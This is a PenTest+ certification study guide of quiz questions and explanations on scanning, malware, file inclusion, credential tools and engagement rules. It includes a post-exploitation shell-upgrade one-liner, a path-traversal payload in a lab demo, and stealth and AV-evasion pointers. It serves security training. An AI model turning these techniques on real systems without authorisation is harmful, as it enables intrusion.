Pentest+


The rules of engagement (RoE)

The rules of engagement (RoE) specify the allowed actions and the allowed targets (what is in scope and what is explicitly out of scope). The rules of engagement can also include a schedule of activities, the time frames in which activities may be conducted (testing windows), and the escalation and communication path to use if something goes wrong. They typically do not include a schedule of payments; that belongs in the contract or statement of work.

A network security analyst is performing a vulnerability scan and gathering information on network hosts. They want to use ICMP traffic to determine whether a host is online and responsive. Which of the following Nmap commands would produce these results? A) -sU B) -sF C) -sN D) -sT

C) -sN (the intended answer is the ping scan, which Nmap actually spells with a lowercase n, -sn; the uppercase -sN is the TCP Null scan, which sends probes with no TCP flags set) #A ping scan sends an ICMP echo request to the target (when run as root it also sends a TCP SYN to port 443, a TCP ACK to port 80, and an ICMP timestamp request). If the target answers with an ICMP echo reply, it is considered alive and responsive; no port scan is performed. #nmap -sF sets only the FIN flag on each probe. A closed port replies with RST while an open or filtered port stays silent, so the result is reported as open|filtered rather than a definitive open; the scan is quieter than a TCP connect scan (-sT) because no connection is ever completed. -sU is a UDP port scan and -sT is a full TCP connect scan; neither uses ICMP for host discovery.

An incident responder discovers the following code that has infected an IoT device: Killer_kill_by_port (htons(23)) What can the incident responder conclude from inspecting the code? A) The malware is carrying out a GRE flood. B) The malware is attempting to eradicate other botnet processes. C) The malware is attempting to kill the SSH service and prevent it from restarting. D) The malware is attempting to kill the Telnet service and prevent it from restarting.

D) The malware is attempting to kill the Telnet service and prevent it from restarting. #htons(23) converts port 23 to network byte order, and port 23 is Telnet; the killer routine finds whatever process is bound to that port, kills it, and in Mirai then binds the port itself so the service cannot come back. This code is part of IoT malware (such as Mirai, whose botnet was used in the 2016 DDoS against Dyn) that scans for and infects IoT devices; after infection the devices become a launch pad for DDoS attacks. The kill process is a way for the code to protect itself: Mirai's killer targets the processes listening on ports 23 (Telnet), 22 (SSH), and 80 (HTTP), which prevents the owner from gaining remote access to the device while it is infected and locks out rival bots that spread over the same services. NOTE: While this specific line of code is not responsible, the same malware can launch different types of attacks, such as a GRE flood, where the flood traffic is built to look like generic routing encapsulation (GRE) packets. GRE is a tunnelling protocol used to establish a direct, point-to-point connection between network nodes.

You need to confirm the security of passwords created by users in the Sales department. Which of the following is the strongest password? A) MyP@$$word B) 1589466 C) password5! D) WeBl0ck!ntru$ions

D) WeBl0ck!ntru$ions #WeBl0ck!ntru$ions is the strongest of these options because it is the longest (16 characters) and it draws on all four character types (uppercase letters, lowercase letters, numbers, and symbols). With the flashcard's count of 24 symbols, each position has 86 possible characters (26 + 26 + 10 + 24), and the search space grows as 86 raised to the password length, so length does more for strength than any single extra character class. The other options are weak for reasons a cracking tool exploits directly: 1589466 is all digits (10 possibilities per position), and MyP@$$word and password5! are dictionary words with the predictable substitutions and suffixes that wordlist rules try first.

Which action or activity is most likely to help an organization when planning for their next penetration test? A) attestation of findings B) client acceptance C) post-engagement cleanup D) lessons learned

D) lessons learned #A lessons-learned review captures what went well and what did not (scoping, communication, tooling, time lost to access problems) so that the next engagement can be planned better. NOTE: Post-engagement cleanup ensures that all systems and devices are returned to their original, pre-test state (test accounts, shells, and tools removed); it is necessary, but it does not by itself inform planning.

You want to employ a Linux distribution mainly aimed at network security monitoring. Which Linux distribution would BEST support network security monitoring? A) DEFT B) Skadi C) ADIA D) Security Onion

D) Security Onion #Security Onion is a Linux distribution mainly aimed at network security monitoring (NSM): it bundles intrusion detection (Suricata), network metadata logging (Zeek), full packet capture, and a search and dashboard stack for working the alerts. It also has other advanced forensic analysis tools. DEFT, Skadi, and ADIA are digital forensics and incident response distributions rather than NSM platforms.

As a penetration tester, you ran a scan against the interconn.com domain. Which of the following list of vulnerabilities is MOST critical and should be at the top of your list for exploitation later? A) Full path disclosure B) Expired certificate C) Clickjacking D) Stored XSS

D) Stored XSS #Stored XSS is the highest priority because the payload is saved by the application and served to every user who views the affected page, so an attacker who finds it can hit visitors with browser redirects, session hijacking, browser-based crypto mining, and web application defacement without any further interaction. An expired certificate, clickjacking, and full path disclosure are real findings, but they are lower impact, and path disclosure is mostly useful as a stepping stone for other attacks.

Directory traversal

Directory traversal is a way of gaining unauthorized file system access. In a directory traversal attack, also known as path traversal, an attacker enters input in a web form, the URL address line, or another input method that gives them access to a file or directory they should not be able to reach, typically by adding dot-dot-slash sequences (../ on Unix, ..\ on Windows) to the path to climb up to the parent directory. Variants such as URL encoding (%2e%2e%2f), double encoding, and null bytes are used to slip past naive filters; the reliable defence is to resolve the requested path and confirm that it still lies inside the allowed directory.

file inclusion attack

File inclusions themselves are normal, useful features of server-side scripting languages (PHP's include and require, for example). They help with maintenance, updates, and code editing by letting one script pull in another, and they also allow web applications to read files from the server's file system. A file inclusion attack occurs when the name of the file to include comes from user input without validation, so the attacker chooses what the server loads.

linkjacking

Linkjacking is a practice used to redirect one website's links to another. Usually this is accomplished by submitting someone else's content to an aggregator website, which in turn drives traffic to the secondary site rather than to the original creator. It is about diverting traffic to a competitor's site, not about compromising the original site.

Similarity between Local file inclusion (LFI), XSS and remote file inclusion (RFI)

Local file inclusion (LFI) and remote file inclusion (RFI) are similar to cross-site scripting (XSS) attacks in that all of them are forms of injection: attacker-controlled input is interpreted as a reference to code or a file instead of as data. RFI is a method that allows an attacker to make the web server include a file hosted at a URL the attacker controls (for example, a PHP application with allow_url_include enabled), which usually means remote code execution. LFI is very similar to RFI, the only difference being that in an LFI attack the attacker can only reference files already on the server (configuration files, /etc/passwd, log files, or previously uploaded content), while RFI uses remote files. LFI is less sophisticated and usually easier to prevent, but it can still escalate to code execution when the attacker can first get their own content onto the server.
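The check the two entries above call for, as an added example that is not part of the original flashcards: a naive server-side include with a traversal/LFI bug beside a hardened include that resolves the real path and refuses anything outside the allowed directory. The web root, the page file, and the "secret" file are constructed in a temporary directory by the example itself; nothing here is a real application's code.

```python
"""Directory traversal / LFI: naive include beside a hardened include.

Added example, not code from the original flashcards. The web root, page
file, and "secret" are all constructed in a temporary directory below.
"""
import os
import shutil
import tempfile


def build_docroot():
    """Constructed layout:  <base>/www/pages/about.html  and  <base>/secret.txt
    (the secret sits two levels above the pages directory, outside the web root)."""
    base = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(base, "www", "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "about.html"), "w") as f:
        f.write("<h1>About</h1>")
    with open(os.path.join(base, "secret.txt"), "w") as f:
        f.write("db_password=hunter2")
    return base, os.path.join(base, "www")


def include_vulnerable(docroot, page):
    """What an LFI bug looks like: the user-supplied name is joined straight onto
    the pages directory, so '../../secret.txt' walks out of the web root."""
    with open(os.path.join(docroot, "pages", page)) as f:
        return f.read()


def include_hardened(docroot, page):
    """Resolve the requested path (following symlinks and collapsing ..), then
    require that it still lies inside the allowed directory and has the
    expected extension. Rejects ../ sequences, absolute paths, and URLs alike."""
    allowed = os.path.realpath(os.path.join(docroot, "pages"))
    target = os.path.realpath(os.path.join(allowed, page))
    if os.path.commonpath([allowed, target]) != allowed:
        raise PermissionError(f"path escapes the pages directory: {page!r}")
    if not target.endswith(".html"):
        raise PermissionError(f"only .html pages may be included: {page!r}")
    with open(target) as f:
        return f.read()


def demo():
    """Run both includes against the same traversal payload and report what happened."""
    base, docroot = build_docroot()
    try:
        payload = "../../secret.txt"
        leaked = include_vulnerable(docroot, payload)      # the secret comes back
        try:
            include_hardened(docroot, payload)
            blocked = False
        except PermissionError:
            blocked = True                                  # the hardened version refuses
        legit = include_hardened(docroot, "about.html")     # a normal page still works
        return {"leaked": leaked, "blocked": blocked, "legit": legit}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

The comparison is done on the resolved path with os.path.commonpath rather than with a string prefix check, because os.path.join discards everything before an absolute second argument and a prefix test would accept a sibling directory such as pages-old. A web framework has already URL-decoded %2e%2e%2f by the time the name reaches this function, which is exactly why the check must be on the final path and not on the raw request.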

RFID Cloning attack

In an RFID cloning attack, RFID tag information is captured wirelessly as it is transmitted between the tag (label) and the reader, and then written to a blank tag. In some cases the cloned information is exactly what is required to enter a secure room or area (user badges), so the cloned badge grants the attacker the same physical access as its owner.

De-confliction

De-confliction occurs when issues no longer conflict with one another. For example, you may discover a vulnerability on a server that requires an update to an application. However, the team that uses the application may not want the update deployed because it changes the way several features operate. If the vulnerability is not critical, you could decide not to deploy the update. But if the update patches critical security issues, you may need to offer the team training so that the update can be made. In a penetration test, de-confliction also refers to the process by which the tester and the client's security team distinguish the tester's activity from real attacks, for example by sharing source IP addresses and time windows so that a live incident is not mistaken for the test (or the test for an incident).

Juice Jacking

A juice jacking attack occurs when a user plugs into a compromised public charging port or uses a tampered cable. The attack uses the data lines of the charging connection to exfiltrate data from the connected device or to load malware onto it. To deal with this situation, use a USB data blocker (a "USB condom", a pass-through adapter with the data lines removed) or just use your own phone charger or an external charging battery. In the quiz scenario this note came from, the employee did not plug in anything; they just clicked a link, so juice jacking was not the attack.

Similarity between DNS poisoning and ARP poisoning

#DNS poisoning occurs when forged host-name-to-IP-address answers are inserted into a DNS cache (a resolver's or a client's) so that name lookups hand out attacker-chosen IP addresses, with the goal of traffic diversion. #DNS poisoning is similar to ARP poisoning. With ARP poisoning, an attacker sends fake ("spoofed") Address Resolution Protocol (ARP) messages on a local network so that an IP address is mapped to the attacker's MAC address, again with the goal of traffic diversion. Both attacks corrupt a lookup table that other hosts trust; DNS poisoning works at the name-to-IP layer and can affect remote clients, while ARP poisoning works at the IP-to-MAC layer and is limited to the local segment.

Hydra Mimikatz Medusa

#Hydra is an active tool that interacts with the targeted server. It goes down a list of username/password combinations in an attempt to brute-force its way in, so it is best to know some information beforehand, such as a valid username. It is a password-cracking tool that supports parallel testing of several network authentication protocols (SSH, FTP, HTTP forms, SMB, RDP, and many more) simultaneously. #Mimikatz retrieves credential material from memory on Windows, mainly from the LSASS process. It is used by both penetration testers and malware. It gathers credentials by extracting key elements such as cleartext passwords, NTLM hashes, Kerberos tickets, and PIN codes, which then feed pass-the-hash and pass-the-ticket attacks. #Medusa is a credential brute-forcing tool similar to Hydra, also modular and parallel.

main goals of the PCI-DSS

1) Build and Maintain a Secure Network 2) Protect Cardholder Data 3) Maintain a Vulnerability Management Program 4) Implement Strong Access Control Measures 5) Regularly Monitor and Test Networks 6) Maintain an Information Security Policy

Settings to configure before running Proxychains.

1) Chain type - dynamic, strict, or random. Dynamic and strict go through each proxy in the list in order (strict fails if any proxy is down; dynamic skips dead proxies), while random picks proxies from the list at random. There is also a chain length setting (chain_len) for random chains to specify how many proxies to chain together. 2) Proxy DNS requests - If this option (proxy_dns) is not set, DNS requests will not be sent through the proxies, and that DNS traffic can be used to identify your system. The only reason to disable this setting is speed. 3) Proxy list - This is the primary list ([ProxyList]) used by Proxychains to direct data. Each entry must have the protocol (SOCKS4, SOCKS5, or HTTP), the IP address, and the port number of the proxy. If the proxy requires authentication, you can also include a username and password, which are stored in cleartext, so restrict the permissions on the configuration file.
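Because the proxy list is stored in cleartext and a missing proxy_dns leaks every lookup, the file is worth checking before the first run. The following is an added example, not part of the original flashcards and not proxychains' own code: it parses a file in proxychains' own syntax (the chain-type keyword, proxy_dns, chain_len, and [ProxyList] lines of the form type host port [user pass]) and reports the settings a tester should confirm. The configuration text is a constructed sample.

```python
"""Parse and sanity-check a proxychains.conf before using it.

Added example, not from the original flashcards or from proxychains. The
configuration below is a constructed sample in proxychains' own syntax.
"""
import re

SAMPLE_CONF = """\
# constructed sample proxychains.conf
strict_chain
#proxy_dns
chain_len = 2
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type  host        port  [user pass]
socks5  127.0.0.1   9050
socks4  10.0.0.5    1080
http    10.0.0.9    3128  alice  s3cret
"""

CHAIN_TYPES = ("dynamic_chain", "strict_chain", "random_chain")
PROXY_TYPES = ("socks4", "socks5", "http")


def parse_proxychains_conf(text):
    """Return the settings that matter: chain type, chain_len, proxy_dns, proxies."""
    cfg = {"chain": None, "chain_len": None, "proxy_dns": False, "proxies": []}
    in_list = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if in_list:
            parts = line.split()
            if parts[0] not in PROXY_TYPES or len(parts) not in (3, 5):
                raise ValueError(f"malformed ProxyList entry: {raw!r}")
            cfg["proxies"].append({
                "type": parts[0], "host": parts[1], "port": int(parts[2]),
                "user": parts[3] if len(parts) == 5 else None,
                "password": parts[4] if len(parts) == 5 else None,
            })
        elif line in CHAIN_TYPES:
            cfg["chain"] = line
        elif line == "proxy_dns":
            cfg["proxy_dns"] = True
        else:
            m = re.fullmatch(r"chain_len\s*=\s*(\d+)", line)
            if m:
                cfg["chain_len"] = int(m.group(1))
    return cfg


def check_config(cfg):
    """Findings a tester wants to see before the first proxychains run."""
    findings = []
    if cfg["chain"] is None:
        findings.append("no chain type uncommented; set dynamic_chain, strict_chain, or random_chain")
    if not cfg["proxy_dns"]:
        findings.append("proxy_dns is commented out: DNS lookups will leave this host directly")
    if cfg["chain"] == "random_chain" and cfg["chain_len"] is None:
        findings.append("random_chain needs chain_len to say how many proxies to use")
    if cfg["chain"] != "random_chain" and cfg["chain_len"] is not None:
        findings.append("chain_len is ignored unless random_chain is selected")
    if not cfg["proxies"]:
        findings.append("ProxyList is empty")
    for p in cfg["proxies"]:
        where = f"{p['type']} {p['host']}:{p['port']}"
        if p["password"] is not None:
            findings.append(f"{where} carries cleartext credentials; chmod 600 the file")
        if p["type"] == "socks4":
            findings.append(f"{where} is SOCKS4: no authentication and IPv4 only")
    return findings


if __name__ == "__main__":
    for finding in check_config(parse_proxychains_conf(SAMPLE_CONF)):
        print("-", finding)
```

On the sample above the checker reports the commented-out proxy_dns, the stray chain_len, the SOCKS4 hop, and the cleartext credentials on the HTTP proxy; uncommenting proxy_dns and switching to random_chain clears the first two.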

Attacks

1) Dictionary attack - occurs when an attacker tries to guess passwords using a list of common words. 2) DoS attack - occurs when a server or resource is overloaded so that legitimate users cannot access it. 3) Pharming attack - occurs when traffic is redirected (for example by DNS poisoning) to a site that looks identical to the intended site. 4) Phishing attack - occurs when confidential information is requested by an entity that appears to be legitimate. 5) Advanced persistent threat (APT) - an organized, well-resourced group, often state-sponsored, makes repeated attempts to breach the company network using sophisticated and targeted attacks and then stays in for a long time. 6) Malicious insider threat - an employee downloads intellectual property from a server to a USB drive to sell to a competitor. 7) Spear phishing - a targeted e-mail spoofing attack that appears to come from a figure of authority seeking access to confidential data. 8) Privilege escalation - an attacker exploits an application design flaw to gain elevated access to protected resources.

Attack Vector (AV) Measurements (in regards to Q.no. 42)

The CVSS Attack Vector metric describes where an attacker must be to exploit the vulnerability, which determines how widely a remediation such as encrypting traffic has to be applied. 1) If the AV measurement is N (Network), the vulnerability is exploitable remotely across routed networks, so it would be necessary to protect (encrypt and authenticate) both internal and external communications with the server. 2) If the AV measurement is A (Adjacent), the attacker must be on the same physical or logical network segment (the same LAN, VLAN, or Wi-Fi network), so it would be necessary to protect the communications of the internal network with the server. 3) If the AV measurement is L (Local), the attacker needs local access to the system (a logged-in session or a local account) rather than a network path, so encrypting network communications would not address it; the fix belongs on the host itself. (CVSS v3 also defines P, Physical, for vulnerabilities that require physical access to the device.)

JPCERT US-CERT CVE

1) The Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) coordinates with Japanese network service providers, security vendors, and government agencies to provide incident response. It also gathers and disseminates technical information on computer security incidents, vulnerabilities, security fixes, and other security information, and issues alerts and warnings. 2) The U.S. Computer Emergency Readiness Team (US-CERT) was established by the U.S. Department of Homeland Security (it is now part of CISA) to analyze and reduce cyber threats and vulnerabilities, disseminate cyber threat warning information, and coordinate incident response activities. It does not provide security compliance standards. 3) Common Vulnerabilities and Exposures (CVE) is a list of common identifiers for publicly known cybersecurity vulnerabilities. With a standardized description for each vulnerability or exposure, it is more of a dictionary than a database. CVE itself does not rank vulnerabilities (severity scores come from CVSS, published for each CVE by the NVD) and does not provide security compliance standards.

What's not included in Rules of engagement (ROE)?

1) Rules of engagement rarely include deploying mitigations, especially when an outside contractor is performing the test; changing the client's systems is outside a tester's role unless the RoE explicitly grant it. 2) Rules of engagement may include approval to deploy mitigations or take other protective action when an internal penetration test is being completed by the organization's own staff. Otherwise the tester's job is to escalate the finding through the channel the RoE define, not to fix it.

Setting parameters while scanning

1) The parameter -T5 (insane) is the most aggressive timing template. Timing templates are specified with the -T option and range from 0 through 5 (paranoid, sneaky, polite, normal, aggressive, insane). 2) The parameter -T0 takes the longest time to scan a network (one probe at a time with a five-minute wait between probes) and is much less likely to set off IDS alerts that key on probe rate, although a single probe to a monitored port can still be logged. 3) The parameter -T5 is much quicker but is very likely to set off IDS alerts and may lose results on slow or unreliable networks.

Types of scan

1) The sensitivity level is the type of scan (discovery scan or assessment scan). The scope is the range of computers you want to scan. The authentication method should be credentialed when the servers contain confidential data, because an uncredentialed scan cannot see inside them. 2) A discovery scan simply provides an inventory of discovered hosts. An assessment scan actually assesses all the hosts that match the criteria given (such as an IP range) for vulnerabilities. 3) A credentialed scan uses the login credentials of a privileged account to access data that is protected by access control lists (ACLs), such as installed software, patch levels, and configuration files. A non-credentialed scan is unable to scan those areas on the hosts and sees only what is exposed on the network. 4) Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code. 5) Vulnerability scanning of a running web application is a category of Dynamic Application Security Testing (DAST). It is worth running against any web application because it can find issues such as cross-site scripting, SQL injection, and command injection. A good example of this kind of tool is the Open Web Application Security Project Zed Attack Proxy (OWASP ZAP). 6) Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.

Some Nmap scripts

1) The smb-enum-shares.nse script retrieves information about remote SMB shares, including whether anonymous users or the supplied account can read or write each one. Readable shares can expose private files, which is an opportunity for data exfiltration, and writable shares are an opportunity for malware propagation. 2) The smb-enum-services.nse script lists the services running on a remote Windows system along with their status (active or inactive). It needs administrative credentials (passed with --script-args smbusername=... and smbpassword=...) because it queries the Service Control Manager. 3) The http-enum.nse script enumerates directories and files used by popular web applications and servers, using a fingerprint database to identify the specific application and, where possible, its version. Like any signature-based check it can still produce false positives, so its hits should be confirmed manually.

You are working for a contracting company that was employed by the federal government. Which organization's publications are likely to be most closely related to your security compliance standards? A) NIST B) JPCERT C) US-CERT D) CVE

A) NIST #The National Institute of Standards and Technology (NIST) is an agency of the U.S. Department of Commerce. Besides promoting innovation, it publishes the security standards that federal agencies and their contractors must follow: FIPS publications and the Special Publication 800 series (for example SP 800-53 security controls and SP 800-171 for protecting controlled unclassified information on contractor systems), together with the Risk Management Framework for assessing the risk an organization faces. Their publications will be most closely related to your security compliance standards. JPCERT, US-CERT, and CVE provide incident coordination and vulnerability information, not compliance standards.

You are a Linux system administrator. You have automated a process, and you want all of the output and error logs to be recorded in a file without your intervention. Which of these following operators will you use? A) &> B) > C) < D) |

A) &> #The &> operator directs both the standard output and the standard error streams to a file (it is a Bash extension; the portable form is >file 2>&1). In Linux, input streams provide input to programs and output streams usually print text characters to the terminal. You use the > or >> operators to direct output to a file. The > symbol creates a file containing the standard output. The >> symbol appends the standard output to an existing file. For example, the following command will write the echoed message to the File1 file: $ echo "Write">File1 NOTE: 1) The > character in the echo command above is a redirection operator; the numbers that can precede it (0 for standard input, 1 for standard output, 2 for standard error) are the file descriptors. If File1 already exists, the command will overwrite it. If you want to prevent files from being overwritten, set the noclobber option of the shell: $ set -o noclobber 2) The < operator redirects standard input so that a command reads from a file instead of the keyboard. The following command uses the tr command to replace spaces in the File1 file with tabs and displays the output on screen, taking its input through the < operator: $ tr ' ' '\t'<File1 3) The pipe (|) operator creates pipelines between commands, which means that you pipe the output of one command to another command as its input. In the following example, you pipe the output of the ls command (with errors merged into the output by 2>&1) to the sort command to display the files sorted by name: $ ls F* 2>&1 |sort A sample output of this command is as follows: File1 File2 File3

You want to share the results of your Nmap with other members of your team. Which parameter stores scan results in Normal, XML, and Grep-able formats? A) -oA B) -oN C) -oX D) -oG

A) -oA #The -oA parameter of Nmap stores output in Normal, XML, and Grep-able formats all at once; it takes a base name and writes basename.nmap, basename.xml, and basename.gnmap. #The -oX parameter changes the output to XML. XML is easily parsed by software, which makes it the preferred format for feeding results into other tools. #The -oN parameter changes the output to the normal, human-readable format, the same as what is printed to the screen. #The -oG parameter changes the output to the Grep-able format, one line per host, which is easy to manipulate with simple Unix tools such as grep, awk, and cut.

While performing a penetration test, a contractor discovers a vulnerability that is being actively used to attack the company's Web server. The contractor knows how to implement the mitigation for the vulnerability and has the appropriate access to do so. Which two actions should the contractor take? A) Escalate the issue according to the rules of engagement and suggest the appropriate mitigation. B) Log in and deploy the appropriate mitigation. C) Shut down the Web server until the appropriate mitigation can be deployed. D) Document the findings with an executive summary, recommendations, and screenshots of the vulnerability. E) Notify management regarding the findings and suggest the appropriate mitigation.

A) Escalate the issue according to the rules of engagement and suggest the appropriate mitigation. D) Document the findings with an executive summary, recommendations, and screenshots of the vulnerability. #Escalation is the appropriate action because the rules of engagement define who must be told, and how, when a live attack is discovered, and documentation is appropriate because the vulnerability is a finding of the penetration test. #The contractor should not log in and deploy the mitigation, even with the access to do so, because changing the client's systems is outside the tester's authority unless the RoE grant it; shutting down the web server is likewise a business decision for the client to make. #The contractor should not notify management directly and suggest the mitigation. Management will want the details in the executive summary and is not usually part of the escalation path documented in the rules of engagement.

During a recent penetration test, you discovered that passwords for an internal application were stored in plaintext. You must ensure that passwords cannot be read. You need to recommend the BEST remediation for this issue only. What should you recommend? A) Hash all passwords and then encrypt the password file. B) Hash all passwords and increase password complexity. C) Encrypt all passwords and implement multi-factor authentication. D) Increase password complexity and implement multi-factor authentication.

A) Hash all passwords and then encrypt the password file. #The best remediation for passwords stored in plaintext is to hash all passwords and then encrypt the password file. Hashing means the application never needs to store the password itself, only a one-way digest it can compare against, and encrypting the file adds a second layer if the file is copied. In practice the hash must be salted (a unique random value per user) and slow (Argon2id, bcrypt, scrypt, or PBKDF2 with a high iteration count); an unsalted fast hash such as plain MD5 or SHA-1 is cracked almost as quickly as plaintext is read. NOTE: You would not recommend hashing all passwords and increasing password complexity. Password complexity does not change how the passwords are stored. Multi-factor authentication is also not effective against this specific issue because the stored plaintext passwords can still be read.
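What the recommended remediation looks like in code, as an added example that is not from the original flashcards: PBKDF2-HMAC-SHA256 from the standard library with a random per-user salt, a verification routine that uses a constant-time comparison, and a one-time migration that converts a constructed plaintext store (the user names and passwords are made up). Argon2id or bcrypt from a vetted library is preferable in production; the structure is the same.

```python
"""Salted, slow password hashing as the fix for plaintext password storage.

Added example, not from the original flashcards. Uses PBKDF2-HMAC-SHA256 from
the standard library so it runs anywhere; swap in Argon2id or bcrypt from a
vetted library in production. The plaintext records below are constructed.
"""
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000      # OWASP's published minimum for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt$digest (base64)."""
    salt = os.urandom(SALT_BYTES)                         # unique per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([ALGORITHM, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(digest).decode("ascii")])


def verify_password(password, record):
    """Recompute the hash with the stored salt and compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = record.split("$")
    if algorithm != ALGORITHM:
        raise ValueError(f"unsupported password record: {algorithm}")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)          # no early exit on mismatch


def migrate_plaintext_store(plaintext_records):
    """One-time migration: replace every plaintext password with a hash record.
    Afterwards the plaintext must be securely deleted and, because the old
    passwords may already be compromised, a forced reset is the usual follow-up."""
    return {user: hash_password(pw) for user, pw in plaintext_records.items()}


# Constructed example of the kind of file the finding describes.
PLAINTEXT_STORE = {"alice": "WeBl0ck!ntru$ions", "bob": "password5!"}

if __name__ == "__main__":
    store = migrate_plaintext_store(PLAINTEXT_STORE)
    for user, record in store.items():
        print(user, record)
    print(verify_password("password5!", store["bob"]), verify_password("Password5!", store["bob"]))
```

Storing the algorithm and iteration count inside the record is what lets the cost be raised later: old records keep verifying, and each user is re-hashed at the new cost on their next successful login.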

You are designing a pen test that mimics the activities of a script kiddie. Which of the following activities should you most likely perform as this "type of attacker"? A) Impersonate a technician that was laid off. B) Perform a SQL injection. C) Post political message on your website. D) Steal funds.

A) Impersonate a technician that was laid off. #Any of the options could be carried out by some attacker, but impersonating a laid-off technician is MOST like the actions of a script kiddie. These attackers are not technically advanced, use prepackaged attack tools they may or may not understand, and rely on well-known methods, including simple social engineering. #Script kiddies do not have in-depth hacking skills or knowledge and are limited to tools and scripts created by others, so crafting a SQL injection against a specific application, running a politically motivated defacement campaign, or stealing funds are better matched to skilled attackers, hacktivists, and organized crime or APT actors respectively.

After all your scans and tests, you must determine if a vulnerability is exploitable. First you need to identify an exploit for the vulnerability. Then you must prioritize your vulnerabilities. Standard protocol would have you start with the highest-severity vulnerabilities that have the greatest likelihood of being exploited. Which of the following would you use to prioritize your vulnerabilities/exploits by the highest severity? (Choose three.) A) It has a matching module in the Metasploit framework. B) It was found via a mass vulnerability scan. C) It is not on a critical server, but is being actively exploited. D) The CVSS V2 database says it has a 9.0 base score or higher.

A) It has a matching module in the Metasploit framework. C) It is not on a critical server, but is being actively exploited. D) The CVSS V2 database says it has a 9.0 base score or higher. #As a general rule, if a vulnerability has a matching module in Metasploit, it should almost always be considered high severity: the exploit is packaged, reliable enough that someone wrote a module for it, and available to anyone. #If you run across a vulnerability that is being actively exploited, another rule of thumb is to tell your client immediately, even if the host is not critical, because confidential information may already be leaking and the host can serve as a foothold for lateral movement. #CVSS consists of three metric groups: Base, Temporal, and Environmental. The Base metrics produce a score ranging from 0 to 10. A base score of 9.0 or higher falls in the High band in CVSS v2 (7.0 to 10.0) and the Critical band in CVSS v3 (9.0 to 10.0); the scores are published per CVE in the National Vulnerability Database (NVD), which is the "database" the question refers to. These should be fixed immediately. #Being found by a mass vulnerability scan is not by itself a high-priority indicator. Those findings must be vetted to make sure they are not false positives.

Given a command: nmap -v -sV -O -sS -T2 192.168.1.1, what is the primary function of the -O switch? A) OS fingerprinting B) Service identification C) Ping scan D) Port selection

A) OS fingerprinting #The -O option tells Nmap to perform OS detection/fingerprinting by comparing the target's TCP/IP stack responses against its fingerprint database. #The -p option selects which ports to scan. #The -sV option performs service and version identification. This gives information on the services running, such as a mail or DNS server and its version, which could help determine the exploits to which a server could be vulnerable. #The -sn option (lowercase n, formerly -sP) performs a ping scan with no port scan. It sends an ICMP echo request by default (plus a TCP SYN to port 443, a TCP ACK to port 80, and an ICMP timestamp request when run as root); if the target responds, it is alive, otherwise it is considered offline. Do not confuse it with -sN (uppercase), which is the TCP Null scan. In the command shown, -v is verbose output, -sS is a SYN scan, and -T2 is the polite timing template.

You are doing a penetration test for InterConn, and in your reconnaissance, you find their website with a front-facing web application. It seems like their input fields are not filtered. Which attack method is the BEST one to use in this scenario? A) SQL injection B) DDoS C) XSS D) Brute force

A) SQL injection #The best attack to use in this scenario is SQL injection. Unfiltered input fields on a front-facing web application suggest that user input reaches back-end queries, and SQL injection could give you access to the database for usernames, e-mail addresses, and password hashes. You need to attack the site, not the clients that use the site, so SQL injection makes the most sense because it attacks the server rather than the clients; XSS through the same unfiltered fields would target users' browsers instead. NOTE: DDoS would make InterConn's site go down, not give you access to its data. DDoS is a variant of DoS in which multiple systems, known as zombies, bots, or drones, flood the target as a single botnet, so as to bring down the system more efficiently and anonymously.

Service disruptions, error messages, and log entries caused by scans may attract attention from a cybersecurity team that causes them to adjust defenses to obstruct a penetration test. Which of these Nmap scans would a tester use to try to remain undetected? A) Stealth scan B) Unauthenticated scan C) Authenticated scan D) Full scan

A) Stealth scan #A stealth scan (-sS, the SYN or half-open scan) performs reconnaissance while trying to remain undetected. It is relatively quiet because it never completes the TCP three-way handshake and never establishes a connection, so applications on the target do not log a connection the way they do for a TCP connect scan (-sT). It requires raw-socket privileges (root) to run. A slow scan speed (-T0 or -T1), packet fragmentation (-f), and decoy source addresses (-D) can also contribute to scan stealthiness, although modern IDS signatures recognize SYN scans readily, so "stealth" is relative.

A penetration tester runs the following command from a compromised system: python -c 'import pty; pty.spawn("/bin/bash")' Which action is the tester taking? A) Upgrading the shell B) Capturing credentials C) Opening a new empty terminal D) Removing the Bash history

A) Upgrading the shell #The tester is upgrading the shell. Popping a shell on a server through netcat or Metasploit is a great feeling, but a raw netcat shell has no pseudo-terminal: if you run a bad command and cause the shell to hang, you would need to use CTRL+C to kill it, which kills the whole connection, and you have to start over and reconnect. Some commands, like su and ssh, refuse to run without a proper terminal. Using Python's pty module, you spawn /bin/bash inside a pseudo-terminal so that the shell behaves like an interactive login. The usual follow-up is to background the shell, run stty raw -echo on the attacker side, foreground it again, and export TERM=xterm so that tab completion, CTRL+C handling, and full-screen tools work. NOTE: Capturing credentials is not the purpose of the command; there are many ways of doing that, many of which are in Metasploit and other tools. The command does not open a new terminal window and does not touch the Bash history.

As part of a penetration test, you aim to evade antivirus checks that the target organization has put in place. Which of the following frameworks would you use? A) Veil B) W3AF C) Nikto D) Tor

